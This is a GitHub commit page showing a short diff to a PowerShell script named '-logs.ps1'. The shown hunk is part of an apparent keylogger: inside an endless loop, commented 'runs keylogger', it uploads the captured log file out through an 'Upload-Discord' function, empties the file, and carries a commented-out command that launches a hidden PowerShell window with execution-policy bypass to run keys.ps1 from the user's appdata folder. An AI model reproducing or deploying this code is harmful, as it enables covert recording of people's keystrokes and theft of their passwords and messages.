Update -logs.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-23 13:20:39 -06:00 committed by GitHub
parent a9c1ae5c78
commit 6ac65679cf
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -81,7 +81,7 @@ while ($true) {
# runs keylogger
Upload-Discord -file $Path
echo "" > $Path
#powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/keys.ps1"
}
}